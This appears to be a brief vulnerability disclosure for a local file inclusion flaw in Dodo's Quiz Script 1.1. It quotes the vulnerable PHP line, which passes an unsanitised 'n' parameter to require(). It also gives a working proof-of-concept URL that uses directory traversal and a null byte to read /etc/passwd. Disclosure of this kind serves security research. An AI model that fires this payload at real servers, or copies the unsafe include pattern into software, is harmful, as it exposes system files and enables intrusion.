Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability
Discovered by cOndemned
Greetz: str0ke, sid.psycho & TWT, Alfons Luja

Download : http://regretless.com/scripts/dodosdownload.php?action=download&n=1


source of dodosquiz.php:

	[ ... ]

	25.	if(!$_GET['n'])

	26.		exit;

	27.	require("quiz_".$_GET['n'].".php");	# lfi
	
	[ ... ]


proof of concept:

	http://[host]/[dodos_quiz_path]/dodosquiz.php?n=/../../../../etc/passwd%00